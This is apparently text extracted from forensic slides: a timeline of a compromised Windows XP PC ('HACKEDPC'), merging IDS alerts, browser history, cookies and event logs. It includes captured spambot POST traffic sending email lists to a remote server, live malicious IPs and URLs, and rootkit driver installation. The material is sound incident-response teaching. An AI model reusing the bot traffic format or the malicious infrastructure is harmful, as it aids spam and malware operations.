http://66.48.78.222/ron/ronz.php?sid=&numpop=2&nid=1535187396&mid=8640037540&servern=&rurl=http://popunder.adsrevenue.net/linksed.php?sn=1781235056920&uip=164.107.xxx.177&siteid=Sniper34&clater=1&serverfile=popnetwork&ref=http%3A%2F%2Fklite.ath.cx%2F&clicksor=&unsold=0&data=rSe_2%CA%D1%D3%CE%CA%D0%D3%D1%CF%CE%C7%2A%7DrOa%5E2%EC%2A%26%26%7B%2A%D0%CC%C3.3%FC%7Db%27%2B%2C%27%C9%D0%C6%FA%FE%2B%23%FC%DA%F3%F4%E9%DED%FE%7Dn%5D%7E%2F%E1%FD%2A%2C3%25%7E%DB%D1%C0%25sLIoV%22%251%2F%D7%D1%C3%F9%7D.%F2%2C%F9jSls2%CC%C52%24%2A%27%26%FC%DA%CE&url=http%3A%2F%2F64.246.15.27%2Fron%2Fblank.phpHistory\Daily -02/19/09 10:22:39 accessed index.dat :Host: yourtrafficserver.com History\Daily -02/19/09 10:22:39 accessed index.dat http://yourtrafficserver.com History\Daily -02/19/09 10:22:50 bro no=ConnectionWithSpamHausDropNet na=NOTICE_ALARM_ALWAYS es=node03.1 sa=164.107.xxx.177 sp=1474/tcp da=91.211.65.76 dp=80/tcp msg=164.107.xxx.177\ had\ a\ connection\ with\ a\ SpamHaus\ DROP\ list\ host tag=@83-10576-6264ad02/19/09 10:22:57 bro02/19/09 10:23:00 bro
02/19/09 10:23:00 accessed index.dat :Host: www.hotelrooms.com History\Daily -02/19/09 10:23:00 accessed index.dat http://www.hotelrooms.com/cgi-bin/search/index.plx?ID=1185303433 History\Daily -02/19/09 10:23:00 accessed [email protected][1].txthotelinternetstrategies.122.2o7.net/ Cookies -02/19/09 10:23:00 accessed smith.99999@lacasaquecanta[2].txtlacasaquecanta.com/ Cookies -02/19/09 10:23:13 accessed index.dat :Host: www.google.com History\Daily -02/19/09 10:23:18 logged SysEvent.Evt EVENT ID: 1 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The System Restore filter encountered the unexpected error '0xC0000001' while processing the file '' on the volume 'Disk0'. It has stopped monitoring the volume. -02/19/09 10:23:19 bro
02/19/09 10:23:21 bro no=ProtocolFound na=NOTICE_FILE es=node04.1 sa=164.107.xxx.177 sp=2145/tcp da=216.195.62.100 dp=2084/tcp num=16 msg=164.107.xxx.177/2145\ >\ 216.195.62.100/2084\ Apache\ (via\ HTTP)\ on\ port\ 2084/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-62725d02/19/09 10:23:54 bro no=ProtocolViolation na=NOTICE_FILE es=node02.1 sa=164.107.xxx.177 sp=2684/tcp da=202.224.39.235 dp=25/tcp num=30 msg=164.107.xxx.177/2684\ >\ 202.224.39.235/smtp\ analyzer\ SMTP\ disabled\ due\ to\ protocol\ violation\ [debug:\ service\=other] sub=reply\ code\ -1\ out\ of\ range\ [50] tag=@83-10576-6281eb02/19/09 10:24:58 accessed index.dat :Host: www.yahoo.com History\Daily -02/19/09 10:25:00 created [email protected][2].txt ad.yieldmanager.com/ Cookies -02/19/09 10:25:07 bro no=ProtocolFound na=NOTICE_FILE es=node04.1 sa=164.107.xxx.177 sp=4702/tcp da=216.195.62.100 dp=2084/tcp num=16 msg=164.107.xxx.177/4702\ >\ 216.195.62.100/2084\ Apache\ (via\ HTTP)\ on\ port\ 2084/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-62a3c002/19/09 10:25:15 bro no=ProtocolFound na=NOTICE_FILE es=node04.1 sa=164.107.xxx.177 sp=4809/tcp da=216.195.62.100 dp=2084/tcp num=16 msg=164.107.xxx.177/4809\ >\ 216.195.62.100/2084\ Apache\ (via\ HTTP)\ on\ port\ 2084/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-62a6fd02/19/09 10:26:50 accessed index.dat :Host: oca.microsoft.com History\Daily -02/19/09 10:26:50 accessed index.dat http://oca.microsoft.com/en/dcp20.asp History\Daily -02/19/09 10:26:52 logged SysEvent.Evt EVENT ID: 7034 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The CcEvtSvc service terminated unexpectedly. It has done this 1 time(s). -02/19/09 10:26:56 created [email protected][2].txt ad.yieldmanager.com/ Cookies -02/19/09 10:26:56 created [email protected][1].txt www.yahoo.com/ Cookies -02/19/09 10:26:56 created system@yahoo[1].txt yahoo.com/ Cookies -02/19/09 10:27:11 accessed index.dat http://webcal.vip.ohio-state.edu/fcgi-bin/swc/lexacal.fcgi?go=login&time_out=on&ada=offHistory\Daily -02/19/09 10:27:24 bro no=ProtocolFound na=NOTICE_FILE es=node04.1 sa=164.107.xxx.177 sp=3093/tcp da=216.195.62.100 dp=2084/tcp num=16 msg=164.107.xxx.177/3093\ >\ 216.195.62.100/2084\ Apache\ (via\ HTTP)\ on\ port\ 2084/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-62dfd602/19/09 10:28:20 bro no=FastFluxSUB12A na=NOTICE_ALARM_ALWAYS es=node05.0 sa=164.107.xxx.177 sp=1035/udp da=207.44.136.106 dp=53/udp msg=\ threshold\ exceeded\ for\ pjpdata-com.relay1c.spamh.com\ SUB:\ 3\ 0.00925925925925925 tag=@be-9e69-877ee02/19/09 10:28:46 accessed index.dat http://www.yahoo.com History\Daily -02/19/09 10:28:46 accessed [email protected][1].txt www.yahoo.com/ Cookies -02/19/09 10:28:47 accessed index.dat http://www.yahoo.com History\Visited Link -02/19/09 10:28:55 bro no=ProtocolFound na=NOTICE_FILE es=node04.1 sa=164.107.xxx.177 sp=4720/tcp da=216.195.62.100 dp=2084/tcp num=16 msg=164.107.xxx.177/4720\ >\ 216.195.62.100/2084\ Apache\ (via\ HTTP)\ on\ port\ 2084/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-6306e702/19/09 10:28:58 bro no=ProtocolFound na=NOTICE_FILE es=node04.1 sa=164.107.xxx.177 sp=4760/tcp da=216.195.62.100 dp=2084/tcp num=16 msg=164.107.xxx.177/4760\ >\ 216.195.62.100/2084\ Apache\ (via\ HTTP)\ on\ port\ 2084/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-6307fc02/19/09 10:29:03 accessed system@yahoo[1].txt yahoo.com/ Cookies -02/19/09 10:29:26 accessed [email protected][2].txt ad.yieldmanager.com/ Cookies -
164.107.xxx.177:1652 > 69.46.16.191:80 POST data: os=2600&ver=2.0.5&idx=cdb30140-ebb8-11d8-a4a8-806d6172696f&user=co&ioctl=10&[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M ^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^J^M^J User-Agent: User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Referrer: Proxied for:
164.107.xxx.177:2315 > 69.46.16.191:80 POST data: os=2600&ver=2.0.5&idx=cdb30140-ebb8-11d8-a4a8-806d6172696f&user=co&ioctl=10&[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^J^M^J User-Agent: User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Referrer: Proxied for:
164.107.xxx.177:3252 > 69.46.16.191:80 POST data: os=2600&ver=2.0.5&idx=cdb30140-ebb8-11d8-a4a8-806d6172696f&user=co&ioctl=10&[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M ^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^J^M^J User-Agent: User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Referrer: Proxied for:
164.107.xxx.177:1629 > 69.46.16.191:80 POST data: os=2600&ver=2.0.5&idx=cdb30140-ebb8-11d8-a4a8-806d6172696f&user=co&ioctl=10&[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M ^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^J^M^J User-Agent: User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Referrer: Proxied for:
![Page 14: legend time activity name path/details](https://reader030.vdocument.in/reader030/viewer/2022013018/61d0cf0504243638ea4d819e/html5/thumbnails/14.jpg)
02/19/09 10:30:23 modified MPNOTIFY.EXE C:\\WINDOWS\SYSTEM32\MPNOTIFY.EXE Windows Executable Code\Executable File, Archive02/19/09 10:30:38 accessed WGATRAY.EXE-350D4455.pf C:\WINDOWS\Prefetch\WGATRAY.EXE-350D4455.pf02/19/09 10:30:38 written WGATRAY.EXE-350D4455.pf C:\WINDOWS\Prefetch\WGATRAY.EXE-350D4455.pf02/19/09 10:30:38 modified WGATRAY.EXE-350D4455.pf C:\WINDOWS\Prefetch\WGATRAY.EXE-350D4455.pf02/19/09 10:30:39 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 10:30:39 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 10:30:44 accessed index.dat http://www.google.com History\Daily -02/19/09 10:30:46 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -
02/19/09 10:30:51 spam!02/19/09 10:30:52 bro no=ProtocolFound na=NOTICE_FILE es=node03.1 sa=164.107.xxx.177 sp=2040/tcp da=216.195.58.113 dp=2085/tcp num=16 msg=164.107.xxx.177/2040\ >\ 216.195.58.113/2085\ Apache\ (via\ HTTP)\ on\ port\ 2085/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-633e2502/19/09 10:30:54 bro
02/19/09 10:30:54 bro 3435 log entries about spamming redacted :-)02/19/09 10:31:01 accessed SMAX4PNP.EXE-1CC48B49.pf C:\WINDOWS\Prefetch\SMAX4PNP.EXE-1CC48B49.pf02/19/09 10:31:01 written SMAX4PNP.EXE-1CC48B49.pf C:\WINDOWS\Prefetch\SMAX4PNP.EXE-1CC48B49.pf02/19/09 10:31:01 modified SMAX4PNP.EXE-1CC48B49.pf C:\WINDOWS\Prefetch\SMAX4PNP.EXE-1CC48B49.pf02/19/09 10:31:02 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 10:31:03 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 10:31:06 accessed SGTRAY.EXE-31581176.pf C:\WINDOWS\Prefetch\SGTRAY.EXE-31581176.pf02/19/09 10:31:06 written SGTRAY.EXE-31581176.pf C:\WINDOWS\Prefetch\SGTRAY.EXE-31581176.pf02/19/09 10:31:06 modified SGTRAY.EXE-31581176.pf C:\WINDOWS\Prefetch\SGTRAY.EXE-31581176.pf02/19/09 10:31:07 accessed TFSWCTRL.EXE-2D67C816.pf C:\WINDOWS\Prefetch\TFSWCTRL.EXE-2D67C816.pf02/19/09 10:31:07 written TFSWCTRL.EXE-2D67C816.pf C:\WINDOWS\Prefetch\TFSWCTRL.EXE-2D67C816.pf02/19/09 10:31:07 modified TFSWCTRL.EXE-2D67C816.pf C:\WINDOWS\Prefetch\TFSWCTRL.EXE-2D67C816.pf02/19/09 10:31:12 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 10:31:46 logged SysEvent.Evt EVENT ID: 26 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Application popup: TransferAgent.exe - Application Error : The application failed to initialize properly (0xc000007b). Click on OK to terminate the application. -02/19/09 10:32:06 bro no=ProtocolViolation na=NOTICE_FILE es=node23 sa=164.107.xxx.177 sp=2383/tcp da=68.178.201.225 dp=25/tcp num=30 msg=164.107.xxx.177/2383\ >\ 68.178.201.225/smtp\ analyzer\ SMTP\ disabled\ due\ to\ protocol\ violation\ [debug:\ service\=other] sub=reply\ code\ -1\ out\ of\ range\ [ERROR:\ ld.so:\ object\ '/tmp/getuid.so'\ fr...] tag=@83-10576-63608402/19/09 10:32:26 accessed index.dat file:///C:/Program Files/AWS/WeatherBug/Local/bot_loading.html History\Daily -02/19/09 10:32:32 accessed index.dat https://edit.yahoo.com/registration History\Visited Link -02/19/09 10:32:34 logged SysEvent.Evt EVENT ID: 4226 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: TCP/IP has reached the security limit imposed on the number of concurrent TCP connect attempts. -02/19/09 10:32:37 created smith.99999@weatherbug[1].txt weatherbug.com/ Cookies -02/19/09 10:32:38 accessed index.dat file:///C:/Program Files/AWS/WeatherBug/Local/center_loading.html History\Daily -02/19/09 10:32:39 accessed index.dat http://deskwx.weatherbug.com/WeatherWindow/WeatherWindow.html?lvl=0&zip=43204&con1=111&sunr=1235045940&suns=1235085120&ut=1235057547&stat=KTZR&L1=535&ver=6.07&camera_id=&ccamzip=<a=<at=<az=&sed=0&lpt=1235048003&rnd=11942&&&&vcw=453&lvw=1210334133&lvd=1209989319&dosp=0&UA1=506&UA5=506&zcode=Z5264&showgutsads=1&screen_x=1152&screen_y=804&lvr=&lvu=&wpt=&A2=171&lvh=&wat=1235056820&A1=50500&dsr=506&dsu=506&dssp=-1&dspm=-1&pmls=1234184569&D3=3&UA3=-1&UA11=&UA15=&L4=23&UA16=&ui=0&n=506267455&alid=0&u=&LRR=&L3=OHHistory\Daily -02/19/09 10:32:40 created smith.99999@tacoda[3].txt tacoda.net/ Cookies -02/19/09 10:32:48 created smith.99999@doubleclick[1].txt doubleclick.net/ Cookies -02/19/09 10:32:50 accessed index.dat http://deskwx.weatherbug.com/WeatherWindow/WeatherWindow.html?lvl=0&zip=43204&con1=111&sunr=1235045940&suns=1235085120&ut=1235057559&stat=KTZR&L1=535&ver=6.07&camera_id=&ccamzip=<a=<at=<az=&sed=0&lpt=1235048003&rnd=14604&&&&vcw=454&lvw=1210334133&lvd=1209989319&dosp=0&UA1=506&UA5=506&zcode=Z5264&showgutsads=1&screen_x=1152&screen_y=804&lvr=&lvu=&wpt=&A2=171&lvh=&wat=1235057523&A1=50500&dsr=506&dsu=506&dssp=-1&dspm=-1&pmls=1234184569&D3=3&UA3=-1&UA11=&UA15=&L4=23&UA16=&ui=1&n=506267455&alid=0&u=&LRR=&L3=OHHistory\Daily -02/19/09 10:32:51 accessed index.dat http://pub.weatherbug.com/RealMedia/ads/adstream_sx.cgi/www.wbug.com/HM/3902@lb1?_RM_HTML_KEYWORDZ3_=43204&_RM_HTML_KEYWORDWO1_=21.20&_RM_HTML_KEYWORDL2_=Columbus&_RM_HTML_KEYWORDL3_=OH&_RM_HTML_KEYWORDHO1_=0.50&_RM_HTML_KEYWORDPC_=Z5264&A1=50500&A2=171&D1=2&D3=3&FC1=111&FC2=4&FC3=40&HO1=0.50&HO4=Mixed Trace.&L1=535&L2=Columbus&L3=OH&L4=23&N=506267455&Nav1=HM&Nav2=HM_Unknown&PC=Z5264&S2=&S3=0&SP1=&SP2=&SP5=-1&TW3=&UA1=506&WO1=21.20&WO3=0&WO4=58.00&Z3=43204&History\Daily -02/19/09 10:32:58 accessed index.dat http://pub.weatherbug.com/RealMedia/ads/adstream_sx.cgi/www.wbug.com/HM/153@lb1?_RM_HTML_KEYWORDZ3_=43204&_RM_HTML_KEYWORDWO1_=21.20&_RM_HTML_KEYWORDL2_=Columbus&_RM_HTML_KEYWORDL3_=OH&_RM_HTML_KEYWORDHO1_=0.50&_RM_HTML_KEYWORDPC_=Z5264&A1=50500&A2=171&D1=2&D3=3&FC1=111&FC2=4&FC3=40&HO1=0.50&HO4=Mixed Trace.&L1=535&L2=Columbus&L3=OH&L4=23&N=506267455&Nav1=HM&Nav2=HM_Unknown&PC=Z5264&S2=&S3=0&SP1=&SP2=&SP5=-1&TW3=&UA1=506&WO1=21.20&WO3=0&WO4=58.00&Z3=43204&History\Daily -02/19/09 10:33:22 accessed [email protected][1].txtserving.adsrevenue.clicksor.net/ Cookies -02/19/09 10:33:22 created [email protected][1].txtserving.adsrevenue.clicksor.net/ Cookies -02/19/09 10:33:23 created smith.99999@adsrevenue[2].txt adsrevenue.net/ Cookies -02/19/09 10:33:24 created smith.99999@adsrevenue[2].txt adsrevenue.net/ Cookies -02/19/09 10:33:29 created [email protected][1].txt 66.221.37.124/ Cookies -02/19/09 10:33:30 created [email protected][1].txt 66.221.37.124/ Cookies -02/19/09 10:33:40 created [email protected][2].txtwww.advertyz.com/ Cookies -02/19/09 10:33:45 accessed index.dat http://klite.ath.cx History\Daily -02/19/09 10:34:06 created system@atdmt[1].txt atdmt.com/ Cookies -02/19/09 10:34:06 created [email protected][1].txt c.live.com/ Cookies -02/19/09 10:34:06 created [email protected][1].txtcouponbar.coupons.com/ Cookies -02/19/09 10:34:06 created [email protected][2].txt home.live.com/ Cookies -02/19/09 10:34:06 created system@live[2].txt live.com/ Cookies -02/19/09 10:34:06 created [email protected][1].txt login.live.com/ Cookies -02/19/09 10:34:06 created system@msn[1].txt msn.com/ Cookies -02/19/09 10:34:06 created [email protected][1].txt p.live.com/ Cookies -02/19/09 10:34:06 created system@quantserve[2].txt quantserve.com/ Cookies -02/19/09 10:34:06 created [email protected][2].txt rad.live.com/ Cookies -02/19/09 10:34:06 created [email protected][1].txt signup.live.com/ Cookies -02/19/09 10:34:06 created smith.99999@bronsonestopshop[1].txtbronsonestopshop.com/ Cookies -02/19/09 10:34:06 created smith.99999@dupontsupercenter[1].txtdupontsupercenter.com/ Cookies -02/19/09 10:34:06 created smith.99999@easymoneywith6[1].txteasymoneywith6.com/ Cookies -02/19/09 10:34:06 created smith.99999@garciaworldshopping[1].txtgarciaworldshopping.com/ Cookies -02/19/09 10:34:06 created smith.99999@hafbargainmall[1].txthafbargainmall.com/ Cookies -02/19/09 10:34:06 created smith.99999@homecybermall[1].txthomecybermall.com/ Cookies -02/19/09 10:34:06 created smith.99999@klywebmall[1].txt klywebmall.com/ Cookies -02/19/09 10:34:06 created smith.99999@kpbmarketing[1].txtkpbmarketing.com/ Cookies -02/19/09 10:34:06 created [email protected][1].txtload.exelator.com/load/ Cookies -02/19/09 10:34:06 created smith.99999@micksmarketplace[1].txtmicksmarketplace.com/ Cookies -02/19/09 10:34:06 created smith.99999@paulwebmall[1].txtpaulwebmall.com/ Cookies -02/19/09 10:34:06 created smith.99999@popunderadvertise[2].txtpopunderadvertise.com/ Cookies -02/19/09 10:34:06 created smith.99999@pro-market[2].txt pro-market.net/ Cookies -02/19/09 10:34:06 created smith.99999@sharmanshoppingcenter[1].txtsharmanshoppingcenter.com/ Cookies -02/19/09 10:34:06 created smith.99999@shopfrhomestore[1].txtshopfrhomestore.com/ Cookies -02/19/09 10:34:06 created smith.99999@stephanusonestop[1].txtstephanusonestop.com/ Cookies -02/19/09 10:34:06 created smith.99999@surrettshoppingcenter[1].txtsurrettshoppingcenter.com/ Cookies -02/19/09 10:34:06 created smith.99999@toyowebmall[1].txttoyowebmall.com/ Cookies -02/19/09 10:34:06 created smith.99999@wilsonfindings77[1].txtwilsonfindings77.com/ Cookies -02/19/09 10:34:06 created [email protected][2].txtwww.advertyz.com/ Cookies -02/19/09 10:34:06 created smith.99999@zedo[2].txt zedo.com/ Cookies -02/19/09 10:34:10 accessed index.dat https://signup.live.com/Redirect.aspx?mkt=en-us&rollrs=12&lic=1&sutk=1235057632640&wa=wsignin1.0History\Visited Link -02/19/09 10:34:10 accessed [email protected][1].txt login.live.com/ Cookies -02/19/09 10:34:11 accessed index.dat https://login.live.com/ppsecure/post.srf?wa=wsignin1.0&rpsnv=10&ct=1235057645&rver=5.5.4177.0&wp=MBI_SSL&wreply=https://signup.live.com/Redirect.aspx?mkt=en-us&rollrs=12&lic=1&sutk=1235057632640&lc=1033&id=68692&slt=B1yRQXXJ*aFcLPgVingrbnFQrXlcxyJ3RVev8NrY*EDGTMx!4gz79HMaETAUcRnmk5F!Lb*JpOFcWuad0NKHGptlODnpnKxzErxWAGrplokR0kktq3s3r1m4dSwJHistory\Visited Link -02/19/09 10:34:13 accessed [email protected][2].txt home.live.com/ Cookies -02/19/09 10:34:26 accessed [email protected][1].txt p.live.com/ Cookies -02/19/09 10:34:34 accessed index.dat http://sup.live.com/WhatsNew/WNFeed.aspx?cid=e93b3cb24497333b&key=23256283-1a41-41a9-9a42-a9d07e52b391&mkt=en-USHistory\Visited Link -02/19/09 10:34:36 accessed index.dat :Host: home.live.com History\Daily -02/19/09 10:34:36 accessed index.dat http://home.live.com History\Daily -02/19/09 10:34:36 accessed index.dat http://home.live.com History\Visited Link -02/19/09 10:34:36 accessed [email protected][1].txt c.live.com/ Cookies -02/19/09 10:34:36 accessed system@msn[1].txt msn.com/ Cookies -02/19/09 10:34:36 accessed [email protected][2].txt rad.live.com/ Cookies -02/19/09 10:34:40 accessed system@quantserve[2].txt quantserve.com/ Cookies -02/19/09 10:34:41 accessed system@atdmt[1].txt atdmt.com/ Cookies -02/19/09 10:34:49 accessed index.dat http://www.google.com History\Daily -02/19/09 10:34:49 accessed index.dat http://www.google.com History\Visited Link -02/19/09 10:34:54 bro no=ProtocolFound na=NOTICE_FILE es=node03.1 sa=164.107.xxx.177 sp=1532/tcp da=216.195.58.113 dp=2085/tcp num=16 msg=164.107.xxx.177/1532\ >\ 216.195.58.113/2085\ Apache\ (via\ HTTP)\ on\ port\ 2085/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-63ae7602/19/09 10:34:55 accessed system@google[1].txt google.com/ Cookies -02/19/09 10:34:57 bro no=ProtocolFound na=NOTICE_FILE es=node03.1 sa=164.107.xxx.177 sp=1592/tcp da=216.195.58.113 dp=2085/tcp num=16 msg=164.107.xxx.177/1592\ >\ 216.195.58.113/2085\ Apache\ (via\ HTTP)\ on\ port\ 2085/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-63afa402/19/09 10:35:01 accessed system@live[2].txt live.com/ Cookies -02/19/09 10:35:01 accessed [email protected][1].txt signup.live.com/ Cookies -02/19/09 10:35:13 accessed smith.99999@tacoda[3].txt tacoda.net/ Cookies -02/19/09 10:35:15 accessed [email protected][1].txtmsnaccountservices.112.2o7.net/ Cookies -02/19/09 10:35:17 accessed smith.99999@garciaworldshopping[1].txtgarciaworldshopping.com/ Cookies -02/19/09 10:35:17 accessed smith.99999@micksmarketplace[1].txtmicksmarketplace.com/ Cookies -02/19/09 10:35:17 accessed smith.99999@shopfrhomestore[1].txtshopfrhomestore.com/ Cookies -02/19/09 10:35:17 accessed smith.99999@toyowebmall[1].txttoyowebmall.com/ Cookies -02/19/09 10:35:21 accessed smith.99999@popunderadvertise[2].txtpopunderadvertise.com/ Cookies -02/19/09 10:35:24 accessed smith.99999@hafbargainmall[1].txthafbargainmall.com/ Cookies -02/19/09 10:35:25 accessed index.dat https://signup.live.com/signup.aspx?mkt=en-us&rollrs=12&lic=1 History\Visited Link -02/19/09 10:35:35 accessed smith.99999@kpbmarketing[1].txtkpbmarketing.com/ Cookies -02/19/09 10:35:36 accessed smith.99999@bronsonestopshop[1].txtbronsonestopshop.com/ Cookies -02/19/09 10:35:36 accessed smith.99999@wilsonfindings77[1].txtwilsonfindings77.com/ Cookies -
no=SMTP_PossibleInternalSpam na=NOTICE_EMAIL es=node01.1 sa=164.107.xxx.177 sp=1865/tcp da=212.227.15.134 dp=25/tcp msg=164.107.xxx.177\ appears\ to\ be\ spamming sub=sent:\ 319\ rejected:\ 30\ percent\ mailto:\ [email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected] tag=@83-10576-633f4b
![Page 15: legend time activity name path/details](https://reader030.vdocument.in/reader030/viewer/2022013018/61d0cf0504243638ea4d819e/html5/thumbnails/15.jpg)
02/19/09 10:35:37 accessed smith.99999@klywebmall[1].txt klywebmall.com/ Cookies -02/19/09 10:35:37 accessed smith.99999@sharmanshoppingcenter[1].txtsharmanshoppingcenter.com/ Cookies -02/19/09 10:35:42 accessed index.dat couponbar.coupons.com/ Cookies -02/19/09 10:35:42 accessed system@coupons[1].txt coupons.com/ Cookies -02/19/09 10:35:42 accessed system@google[1].txt google.com/ Cookies -02/19/09 10:35:45 accessed [email protected][1].txtcouponbar.coupons.com/ Cookies -02/19/09 10:35:47 accessed stats[2].htm C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\BR3XKV9F\stats[2].htmWeb Page Document Match File, Archive, Not Indexed02/19/09 10:35:47 created stats[2].htm C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\BR3XKV9F\stats[2].htmWeb Page Document Match File, Archive, Not Indexed02/19/09 10:35:47 modified stats[2].htm C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\BR3XKV9F\stats[2].htmWeb Page Document Match File, Archive, Not Indexed02/19/09 10:35:47 written stats[2].htm C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\BR3XKV9F\stats[2].htmWeb Page Document Match File, Archive, Not Indexed02/19/09 10:35:57 logged SysEvent.Evt EVENT ID: 6006 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Event log service was stopped. -
02/19/09 10:36:18 system shutdown?02/19/09 10:36:19 created zmzfozjg C:\\WINDOWS\zmzfozjg ! Bad signature File, Archive02/19/09 10:36:19 modified zmzfozjg C:\\WINDOWS\zmzfozjg ! Bad signature File, Archive02/19/09 10:36:19 written zmzfozjg C:\\WINDOWS\zmzfozjg ! Bad signature File, Archive02/19/09 10:36:20 accessed seneka.sys C:\\WINDOWS\SYSTEM32\DRIVERS\seneka.sys Device Driver Code\Executable Match File, Archive02/19/09 10:36:20 created seneka.sys C:\\WINDOWS\SYSTEM32\DRIVERS\seneka.sys Device Driver Code\Executable Match File, Archive02/19/09 10:36:20 modified seneka.sys C:\\WINDOWS\SYSTEM32\DRIVERS\seneka.sys Device Driver Code\Executable Match File, Archive02/19/09 10:36:20 written seneka.sys C:\\WINDOWS\SYSTEM32\DRIVERS\seneka.sys Device Driver Code\Executable Match File, Archive
02/19/09 10:37:01 system boots...02/19/09 10:37:02 logged SysEvent.Evt EVENT ID: 9 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Broadcom 440x 10/100 Integrated Controller: Network controller configured for 100Mb full-duplex link. -02/19/09 10:37:03 written seneka C:\\WINDOWS\SYSTEM32\CONFIG\SYSTEM\NTRegistry\$$$PROTO.HIV\ControlSet003\Services\senekaFolder ! Bad signature Folder, Registry Entry02/19/09 10:37:03 written seneka C:\\WINDOWS\SYSTEM32\CONFIG\SYSTEM\NTRegistry\$$$PROTO.HIV\ControlSet004\Services\senekaFolder ! Bad signature Folder, Registry Entry02/19/09 10:37:09 accessed DVDLauncher.exe C:\\Program Files\CyberLink\PowerDVD\DVDLauncher.exe Windows Executable Code\Executable File02/19/09 10:37:09 accessed acrotray.exe C:\\Program Files\Adobe\Acrobat 7.0\Distillr\acrotray.exe Windows Executable Code\Executable File, Archive02/19/09 10:37:09 accessed issch.exe C:\\Program Files\Common Files\InstallShield\UpdateService\issch.exe Windows Executable Code\Executable File, Archive02/19/09 10:37:09 accessed senekafqqjlktq.dll C:\\WINDOWS\SYSTEM32\senekafqqjlktq.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 10:37:09 accessed senekalhtijurw.sys C:\\WINDOWS\SYSTEM32\DRIVERS\senekalhtijurw.sys Device Driver Code\Executable Match File, Archive02/19/09 10:37:09 accessed smax4pnp.exe C:\\Program Files\Analog Devices\Core\smax4pnp.exe Windows Executable Code\Executable File, Archive02/19/09 10:37:09 modified senekafqqjlktq.dll C:\\WINDOWS\SYSTEM32\senekafqqjlktq.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 10:37:09 written senekafqqjlktq.dll C:\\WINDOWS\SYSTEM32\senekafqqjlktq.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 10:37:10 accessed ethqqaeg.sys C:\\WINDOWS\SYSTEM32\DRIVERS\ethqqaeg.sys Device Driver Code\Executable Match File, Archive02/19/09 10:37:12 accessed hiberfil.sys http://ubw.osu.edu/ubw_at_ohio.htm Bookmarks -02/19/09 10:37:12 accessed hiberfil.sys http://ubw.osu.edu/underwater_basket_weaving_facilit `ies_at_ohio.htm Bookmarks -02/19/09 10:37:12 accessed hiberfil.sys http://www.microsoft.com/isapi/redir .dll?prd=ie&ar=windowsm!a Bookmarks -02/19/09 10:37:12 accessed hiberfil.sys http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=hotmail Bookmarks -02/19/09 10:37:13 accessed zmzfozjg C:\\WINDOWS\zmzfozjg ! Bad signature File, Archive02/19/09 10:37:22 logged SysEvent.Evt EVENT ID: 6009 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Microsoft (R) Windows (R) 5.01. 2600 Service Pack 3 Uniprocessor Free. -02/19/09 10:37:22 logged SysEvent.Evt EVENT ID: 6005 EVENT TYPE: INFORMATION EVENT CATEGORY: 